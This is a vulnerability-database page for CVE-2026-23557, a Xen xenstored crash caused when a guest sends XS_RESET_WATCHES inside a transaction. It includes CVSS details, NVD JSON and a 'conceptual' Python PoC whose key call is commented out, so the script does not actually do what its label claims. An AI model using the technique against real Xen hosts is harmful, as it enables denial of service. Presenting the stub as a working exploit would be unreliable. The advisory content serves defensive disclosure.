Security Vulnerability Report
中文
CVE-2026-23557 CVSS 6.5 MEDIUM

CVE-2026-23557

Published: 2026-05-19 14:16:39
Last Modified: 2026-05-19 18:56:36
Source: [email protected]

Description

Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES command within a transaction due to an assert() triggering. In case xenstored was built with NDEBUG #defined nothing bad will happen, as assert() is doing nothing in this case. Note that the default is not to define NDEBUG for xenstored builds even in release builds of Xen.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:xen:xen:*:*:*:*:*:*:*:* - VULNERABLE
Xen (特定版本,详见XSA-484)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Conceptual PoC for CVE-2026-23557 # This script attempts to trigger the xenstored crash. import xs def trigger_poc(): try: # Connect to xenstored handle = xs.open() print("[+] Connected to xenstored") # Start a transaction transaction = handle.transaction_start() print(f"[+] Transaction started: {transaction}") # Issue XS_RESET_WATCHES inside the transaction # Note: Actual implementation depends on python-xs bindings exposing raw commands # This represents the logic described in the advisory print("[+] Sending XS_RESET_WATCHES inside transaction...") # If the bindings allow it, this would be the call: # handle.reset_watches(transaction) # If successful, xenstored should crash due to assert() print("[!] Command sent. Check if xenstored crashed.") handle.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": trigger_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23557", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:38.817", "lastModified": "2026-05-19T18:56:35.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES\ncommand within a transaction due to an assert() triggering.\n\nIn case xenstored was built with NDEBUG #defined nothing bad will\nhappen, as assert() is doing nothing in this case. Note that the\ndefault is not to define NDEBUG for xenstored builds even in release\nbuilds of Xen."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "matchCriteriaId": "37DFEBDB-42A9-4A8C-A040-CC08782EF553"}]}]}], "references": [{"url": "https://xenbits.xenproject.org/xsa/advisory-484.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/28/11", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}, {"url": "http://xenbits.xen.org/xsa/advisory-484.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.